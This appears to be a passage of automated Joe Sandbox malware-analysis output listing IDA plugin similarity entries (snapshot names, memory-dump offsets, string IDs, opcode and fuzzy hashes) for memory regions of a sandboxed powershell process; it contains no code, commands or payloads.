                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                          • API String ID: 0-663938088
                          • Opcode ID: 9ed73a10518e22d2834d9765b687329aef41f12e44097302bf6cf6e4fa8f957c
                          • Instruction ID: dd68b5efd274e5172db155bffa8b79e2fc3bb7427ca36c29e5e779ea6898176a
                          • Opcode Fuzzy Hash: 9ed73a10518e22d2834d9765b687329aef41f12e44097302bf6cf6e4fa8f957c
                          • Instruction Fuzzy Hash: 7D826BB4A002049FEB14CB94C554BEEB7B2BFC6308F25815AD905AF395CB72ED46CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq
                          • API String ID: 0-3075684691
                          • Opcode ID: 0cc593cbacf1a3611aa6aa85a1b89ed5e8c365918a556c6098421c35e8a4d0ef
                          • Instruction ID: 0f38a28eeef271147a0a55851e0087d104907d48561ec485df67e90e06886090
                          • Opcode Fuzzy Hash: 0cc593cbacf1a3611aa6aa85a1b89ed5e8c365918a556c6098421c35e8a4d0ef
                          • Instruction Fuzzy Hash: 7292A4B0E043159FE724CB64C954BAAB7B2BF86304F5085AED5096F785CB31ED41CBA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$$q$$q$$q$$q$$q$$q
                          • API String ID: 0-2370149875
                          • Opcode ID: 1c3c5fcb90ba2ff46a1757a84eef9c572f0e58a850982dd5147ee29e8c8bf5b7
                          • Instruction ID: f86e95081f746bb3cc924822bbb37c737e48179c1028cfe9304de6a1cc6e9970
                          • Opcode Fuzzy Hash: 1c3c5fcb90ba2ff46a1757a84eef9c572f0e58a850982dd5147ee29e8c8bf5b7
                          • Instruction Fuzzy Hash: FE1237B1B043069FDB258A79C8586FABBE5BF86210F18847BD905CF2D1DA31C941C7E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q
                          • API String ID: 0-1794337482
                          • Opcode ID: 69bbae009018690ed34cd47652a01ad70198c5971bf54ec512eb3c2d999eb7e2
                          • Instruction ID: 98d31d0ccac45aa0cdfda5a98b905aef6e0a7f9c7f262c938053a5c9a1007fca
                          • Opcode Fuzzy Hash: 69bbae009018690ed34cd47652a01ad70198c5971bf54ec512eb3c2d999eb7e2
                          • Instruction Fuzzy Hash: F4526BB4A00204DFEB04CB94C544BD9BBB2FF86308F65815ADA056F396CBB6ED45CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$$q$$q$$q
                          • API String ID: 0-170447905
                          • Opcode ID: d7ed19877f86b8300f6fc1a037ab927aa579dfe973adae03d8d393223539159a
                          • Instruction ID: 4fb356d4c8303cef0a7f05ca94a7cdfa9caa8c0af6e13aa42aef02f3f2a4ab31
                          • Opcode Fuzzy Hash: d7ed19877f86b8300f6fc1a037ab927aa579dfe973adae03d8d393223539159a
                          • Instruction Fuzzy Hash: 3821F9B2B04217CFEB35566584143F6B7A2BFC2111B28847BC54A9B1D5EB39C853CBE2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q$4'q$4'q
                          • API String ID: 0-3126650252
                          • Opcode ID: e0334ce163dbbd9b17c8d2bbf93757ef58ee2848d017abac1e0b9ad700dc6e49
                          • Instruction ID: e7adc425073359a048075f8c42623dda88ebb6ba29a9586a8671a21af30808db
                          • Opcode Fuzzy Hash: e0334ce163dbbd9b17c8d2bbf93757ef58ee2848d017abac1e0b9ad700dc6e49
                          • Instruction Fuzzy Hash: 42B26FB4A003199FE724DB64C950BEAB7B2BF89304F1085A9D9096F795CB31ED81CF91
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hq$$q$$q
                          • API String ID: 0-405414136
                          • Opcode ID: d96f5cc9a28f30d662b7c347ebe6487ad56aa28566b5a31fd46b35a644322ce9
                          • Instruction ID: 1aec3492882f153c7daafeb09e5d184ebe139065f16c03becf70a697bd6ac8ac
                          • Opcode Fuzzy Hash: d96f5cc9a28f30d662b7c347ebe6487ad56aa28566b5a31fd46b35a644322ce9
                          • Instruction Fuzzy Hash: 6E227F30B002188FEB25DB25C8546AEB7B2BF89305F1485A9D90AEB351DF75ED85CF81
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$$q$$q
                          • API String ID: 0-3067366958
                          • Opcode ID: 60e7afc260cded389c7671f3de7db837b45a1ed6e97bd8d41f9c2c69cd32fd0c
                          • Instruction ID: 4a0ffff9947a50c2a73dd059b7ed8caf1f37bb28fef627d15a17c6188eb7b50e
                          • Opcode Fuzzy Hash: 60e7afc260cded389c7671f3de7db837b45a1ed6e97bd8d41f9c2c69cd32fd0c
                          • Instruction Fuzzy Hash: 2B2132B1714306AFEB34596A88807FB7396BBC1614F24843BA50DDB2C1DE35D84293A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $q$$q
                          • API String ID: 0-3126353813
                          • Opcode ID: 17efc0c41756dfcf5689b1fc098781e8d7b8b3011c98dc3fc9937e6e6fd9dbce
                          • Instruction ID: d1cd3464887d91a298e8c2914f46bbe64caceee9fd9a6d3743e2b18d4a540233
                          • Opcode Fuzzy Hash: 17efc0c41756dfcf5689b1fc098781e8d7b8b3011c98dc3fc9937e6e6fd9dbce
                          • Instruction Fuzzy Hash: A11136B13143066FEB3408268980BF637966BC1714F244427AA0CAB6C6DA35D486D2E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q
                          • API String ID: 0-1807707664
                          • Opcode ID: 257609aa023eef90f88a6953e48654173fe823105e903f199b54fb793573c014
                          • Instruction ID: 9978bc30a236f150f4bffb97f73878ff2927aff78bbcc639025df7ee66d82428
                          • Opcode Fuzzy Hash: 257609aa023eef90f88a6953e48654173fe823105e903f199b54fb793573c014
                          • Instruction Fuzzy Hash: C77292B4A00315DFE724DB54C950BAAB7B2BF86304F5085AED54A6B781CB31ED81CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q
                          • API String ID: 0-1807707664
                          • Opcode ID: 37f0eda10c64f265ff4cf858ffb9a1385eca68a4fd127cfe447888401966738b
                          • Instruction ID: 45f0565ce58ffbeb685d9e25f6b82ba38b3c4500fd226473e16c4c1b7a765ad1
                          • Opcode Fuzzy Hash: 37f0eda10c64f265ff4cf858ffb9a1385eca68a4fd127cfe447888401966738b
                          • Instruction Fuzzy Hash: E03271B4A00315DFE724DB64C950BAAB7B2BF85304F5085AED5496B781CB31ED81CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q
                          • API String ID: 0-1807707664
                          • Opcode ID: c70a19627fd939d04ece7b9ba03fa2a9165252e693174b0ac8b74a399d6a6c82
                          • Instruction ID: 7eefb04b861cbfe4397a57ff66952c733d2af89db1e99e0a1bbe7205fa4dae50
                          • Opcode Fuzzy Hash: c70a19627fd939d04ece7b9ba03fa2a9165252e693174b0ac8b74a399d6a6c82
                          • Instruction Fuzzy Hash: 343271B4A003159FE724DB54C950BEAB7B2BF89304F1085A9D94A6F785CB32ED81CF91
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q
                          • API String ID: 0-1807707664
                          • Opcode ID: 87dc38c12685eabfe81dd0d80ac4acfdd3258de9f56dcd15c3c517ab1463e50a
                          • Instruction ID: 316b3d6ea91fb0f577be61c8ca3ce8dc4277b3d997d148b32af1a414ced885c9
                          • Opcode Fuzzy Hash: 87dc38c12685eabfe81dd0d80ac4acfdd3258de9f56dcd15c3c517ab1463e50a
                          • Instruction Fuzzy Hash: A8122EB4A04315DFEB60CB64C950BEAB7B2BB46304F1085EAD519AB791CB31ED81CF91
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 23dc2b03e0d77cfb62a77abe8db94b646a5009f73d88850c13770075a73832d3
                          • Instruction ID: 65dd715c65c9baf816ceb90e30e37aa24ac4bb2074f6b7721e1db8680a17d1c3
                          • Opcode Fuzzy Hash: 23dc2b03e0d77cfb62a77abe8db94b646a5009f73d88850c13770075a73832d3
                          • Instruction Fuzzy Hash: 94E16F74E05248AFEB11CFA8C484A9DBBF1EF49314F288599E404EB362D774ED45CB91
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 538a5f84d233f70d1be23c97ad4f3b88ea7c3440102900646d95981836de1507
                          • Instruction ID: dfb76ad4ec28e2f919b0176002da0f124c85784d9f170dea40e65ba21c2eb512
                          • Opcode Fuzzy Hash: 538a5f84d233f70d1be23c97ad4f3b88ea7c3440102900646d95981836de1507
                          • Instruction Fuzzy Hash: 80D11874A00209EFEB15CF98D484AADFBB2FF48314F248659E805AB755C771ED92CB90
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d98dc72adc71888a1b853d201ecbfd67a0c8328479084d82dd1f7d181eff6f1e
                          • Instruction ID: fbd4b00db01256b72ef643640a840e291a395dfd1a48519b0ca5cc585ec6baca
                          • Opcode Fuzzy Hash: d98dc72adc71888a1b853d201ecbfd67a0c8328479084d82dd1f7d181eff6f1e
                          • Instruction Fuzzy Hash: 07C1BF31A002089FEB14DFA4C944AADBBB2FF84714F154A69E4069B365DBB4EC49DB80
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1831212d7bdb38784fcd8b53ccea7e4b4de2abd93710eadf254fae154015e017
                          • Instruction ID: 27d576ee27265bc4a10eec10e883acfb2890b5a209b584ac82e3620106ecdab2
                          • Opcode Fuzzy Hash: 1831212d7bdb38784fcd8b53ccea7e4b4de2abd93710eadf254fae154015e017
                          • Instruction Fuzzy Hash: D6C14EB4B012099FE714CB98C544BEDB7B2FF89314F148066E9099F795CB72ED428B92
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2457bc9546dbb4428910238f883e877e31a6c1802b3f71d4b5577f674b970040
                          • Instruction ID: 553e7e384eedd313a6effa175bcae2b7c034c56d755d201b8bb57025c95a9e9c
                          • Opcode Fuzzy Hash: 2457bc9546dbb4428910238f883e877e31a6c1802b3f71d4b5577f674b970040
                          • Instruction Fuzzy Hash: 49C11974A00208EFEB15CFA8D484A9DBBF2FF88314F148559E805AB755D775ED82CB90
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a34549417f2c87980f71f7dcd135e8a1eb6f658c86c1a8ca6114cc7a94856701
                          • Instruction ID: 7747af478057c92fd43c819a39bc6a376cdf883bd321faf178d86cd3f8ed456d
                          • Opcode Fuzzy Hash: a34549417f2c87980f71f7dcd135e8a1eb6f658c86c1a8ca6114cc7a94856701
                          • Instruction Fuzzy Hash: 67B16171E00209DFEB10CFA9D88579DBBF1BF48308F148629DA15E7254EBB4A855CF85
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f19907050ff9a48dd2a38c6cb8a8234fe899930b2bd63374cba4e1ea8aec9bd
                          • Instruction ID: d941e8c2b49f18709fb51cf0743091c2ff6aab2f12f712b1312bd5c07f0faf45
                          • Opcode Fuzzy Hash: 0f19907050ff9a48dd2a38c6cb8a8234fe899930b2bd63374cba4e1ea8aec9bd
                          • Instruction Fuzzy Hash: 24B16171E00209DFEB10CFA9D8857DDBBF1AF48318F148A29D654E7254EBB4A895CB81
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6650786c25ec724521ee9b94e9ba82edf97b2965a8565118fe38a000c730482e
                          • Instruction ID: 32495cad4e63ce594c3c66decef4bff85f272edbd6ae1900e884f6edbc974fa5
                          • Opcode Fuzzy Hash: 6650786c25ec724521ee9b94e9ba82edf97b2965a8565118fe38a000c730482e
                          • Instruction Fuzzy Hash: 0791BE74A04209CFDB15CF58C494AAAFBB1FF48310B258A9AD855DB3A1C735FC91CBA4
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec8c15fbc487a42c5ab35f561803a60f46761ccd4708b806e73119583219c62d
                          • Instruction ID: e25ed427c26c13249db2c681f5dd339988234a34aa315a0db19f559348ece4da
                          • Opcode Fuzzy Hash: ec8c15fbc487a42c5ab35f561803a60f46761ccd4708b806e73119583219c62d
                          • Instruction Fuzzy Hash: 7B71BF70A002088FEB24DF68C890AAEBBF2FF85314F148A69D405DB751DB74EC56CB90
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad9f562b4f17c35cfa285d0aa8fb90d6e77baaf5c9942a76a6067b201d9196a7
                          • Instruction ID: 61619ea88806377c39fe324ca535db762402e3cc2c32b615bbb8f4df773c33f8
                          • Opcode Fuzzy Hash: ad9f562b4f17c35cfa285d0aa8fb90d6e77baaf5c9942a76a6067b201d9196a7
                          • Instruction Fuzzy Hash: D5716D70A002089FEB14DFA5D490BADBBF2BF88304F148929D401EB794DB75ED4ADB50
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fdf3d8013a7c4a137e1dd210c6da3213e1a303f9a94d8a9806d484fd1fb7d599
                          • Instruction ID: c325eb77df9d35dd42d9d68be47013b1fd69438cb04c1ebf20432fb10b2df3aa
                          • Opcode Fuzzy Hash: fdf3d8013a7c4a137e1dd210c6da3213e1a303f9a94d8a9806d484fd1fb7d599
                          • Instruction Fuzzy Hash: F641E3B2B002159FEB249BB588003FEB7A1BFC5214F24893AD9199B3C1DA32DD41C7E5
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6507adf569dda8c9d8f3ea42fcce72d4059fc3b3a48764fd08bbe60c1f904320
                          • Instruction ID: b9a2b0ff7d3dcba78dd005bc40839bc87d56778db7de694e18ea9c3317338269
                          • Opcode Fuzzy Hash: 6507adf569dda8c9d8f3ea42fcce72d4059fc3b3a48764fd08bbe60c1f904320
                          • Instruction Fuzzy Hash: 40418D35B002049FEB15DB34C4586AE7BB2FF89750F184569E402EB7A0CB78AD85EB90
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d15a1f22256c834ae6aeaac8a67ceb2102f016d94d7330d5b03b4a06db69d835
                          • Instruction ID: 5c5a014fd4f0ba40d6af0d948b8bd5cb08d32e44677fa28fb22e29a08a5d86c0
                          • Opcode Fuzzy Hash: d15a1f22256c834ae6aeaac8a67ceb2102f016d94d7330d5b03b4a06db69d835
                          • Instruction Fuzzy Hash: EB419E70A00208DFEB14DFA5C8946ADBBB2FF85314F14896DD401EB795DBB4AC4ADB50
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9cf867ee49b8e021f8f6156270c1225eb33d2ad28739d7721b6a6f36a0663777
                          • Instruction ID: 0e874cce2d363262d54b92c1b9d42310dbe7b81068055025d0d74e988b4718f4
                          • Opcode Fuzzy Hash: 9cf867ee49b8e021f8f6156270c1225eb33d2ad28739d7721b6a6f36a0663777
                          • Instruction Fuzzy Hash: 8E51EA34A00209EFEB15DF94D484A9DFBF2FF88314F288559E405AB365C775AD92CB50
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad15d63df50a43dc232f3768ad25f8eed7c9f31294b68ad8ecb3e5ecbc747491
                          • Instruction ID: 402671aab5e485888174f08bf242d86438cd4c9fea45addeaeeeb5687ed5f5aa
                          • Opcode Fuzzy Hash: ad15d63df50a43dc232f3768ad25f8eed7c9f31294b68ad8ecb3e5ecbc747491
                          • Instruction Fuzzy Hash: BA417C75A00209CFDB15CF58C094AAEF7B1FF48324B158699D806AB365C736FC91CBA4
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b2c637b5c7f0b024559c54af64921c59178490cf300304b1715b8fa4a90c3e3
                          • Instruction ID: f441ed5eff09a61578a04bb749ecd19ae2def904e77a5fe38864f60ffdd63b33
                          • Opcode Fuzzy Hash: 8b2c637b5c7f0b024559c54af64921c59178490cf300304b1715b8fa4a90c3e3
                          • Instruction Fuzzy Hash: 5941BE309093859FDB16CF68C9909A9BBF1FF4A310B154696D484DB362C735FC81CBA5
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 29e9685d61fc00b22ffb368c92cb708586317c99574f4e316d022e590b75ecca
                          • Instruction ID: d1385fb749e3b37da6e43c856f7d09064f9baddb956e855ae358dc3d8e0a46ee
                          • Opcode Fuzzy Hash: 29e9685d61fc00b22ffb368c92cb708586317c99574f4e316d022e590b75ecca
                          • Instruction Fuzzy Hash: 633138B0704345AFDB158E69C4646BA7FA5BF82210F198966D808CF7D2DA30DD41C3B5
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e97ec2a20e05faf2f796e7171973b7647f6efd4d60eb2ed16ffe027eba04b4b4
                          • Instruction ID: 2c93a34fba6da75db1ab7477a814db4b977a5ab0e235d661db67c35e501319c8
                          • Opcode Fuzzy Hash: e97ec2a20e05faf2f796e7171973b7647f6efd4d60eb2ed16ffe027eba04b4b4
                          • Instruction Fuzzy Hash: DA317074B10204ABE7149B64C954BAF77A3AFC6304F658029EA016F7D1CF76DD428BD1
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6fa1eb8af15c4e523ff6f0f6a57df1d2a103c68bec90582ada2773bc15184a38
                          • Instruction ID: 233e05a9dd616e6bd690a88fb88ed4aa3ef91f52a8da7a1704cf71af4c5c966e
                          • Opcode Fuzzy Hash: 6fa1eb8af15c4e523ff6f0f6a57df1d2a103c68bec90582ada2773bc15184a38
                          • Instruction Fuzzy Hash: 792149B170031AABE7285A6A88047BB73D6BBC5314F14843FA54DEB3C5CE71D84183A1
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4120fe36acf846f74f157fd23bb66704258cd4672c62a8888bde086caad80551
                          • Instruction ID: 89eacf4bdaf8c177ac46b14f08d6c40953e6f82a1f2b8268691a3d536099ecf0
                          • Opcode Fuzzy Hash: 4120fe36acf846f74f157fd23bb66704258cd4672c62a8888bde086caad80551
                          • Instruction Fuzzy Hash: 75313B30B012188FDF26DB64C8546EEB7B2AF89305F1045E9D509AB351CB75AE95CF81
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 70ada50dee90ad58182a320883fd27ba8a9c4bf32f6e184b636f999b04d60996
                          • Instruction ID: 5a96a5f5d5b348074caf8e080c4ff9e934669aaf9f2db205159263f2f1a3c65c
                          • Opcode Fuzzy Hash: 70ada50dee90ad58182a320883fd27ba8a9c4bf32f6e184b636f999b04d60996
                          • Instruction Fuzzy Hash: 36313875A006069FDB14CF98C580AAAFBF1FF48310B258699D419EB751C332FC92CBA4
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 553bd12de0444f414d436ecb371667e1f385a70b55ef4c1050553b7c84447fa5
                          • Instruction ID: bcef28b3b49797c6cc3e058e1fe4e54f8aa256522eaaccad0c695bac96e2fc4e
                          • Opcode Fuzzy Hash: 553bd12de0444f414d436ecb371667e1f385a70b55ef4c1050553b7c84447fa5
                          • Instruction Fuzzy Hash: D6317CB4A08245DFDB01CF68C8909AABBF1FF4A310B154596D448DB352C335EC91CBA1
                          Memory Dump Source
                          • Source File: 00000002.00000002.1646704491.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_48a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 505b793f8a596674ad642932f0d0bbfbdc565d1be2efadc1bf658dbca6aa6daa
                          • Instruction ID: 31e0c5b02f61dd46431408edb73ba15168dde9f50aa4ee158cfeec121ada00c4
                          • Opcode Fuzzy Hash: 505b793f8a596674ad642932f0d0bbfbdc565d1be2efadc1bf658dbca6aa6daa
                          • Instruction Fuzzy Hash: A0312575A006069FDB15CF98C580AA9F7F2FF48310B258699D459EB752C332FC91CBA4
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d681cf03d629c95007366110ea387075b9bf3c4f954176bdd74dc5258018b78e
                          • Instruction ID: 4babe3746e87215459eb068b279918d09b7926c2a8342ef775939256381cf121
                          • Opcode Fuzzy Hash: d681cf03d629c95007366110ea387075b9bf3c4f954176bdd74dc5258018b78e
                          • Instruction Fuzzy Hash: 9E115BB170031EA7EB38096649017B777D67F85304F18843EAA48BA2C5CA75D98083E1
                          Memory Dump Source
                          • Source File: 00000002.00000002.1661058223.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7500000_powershell.jbxd
                          Similarity
                          • API ID:
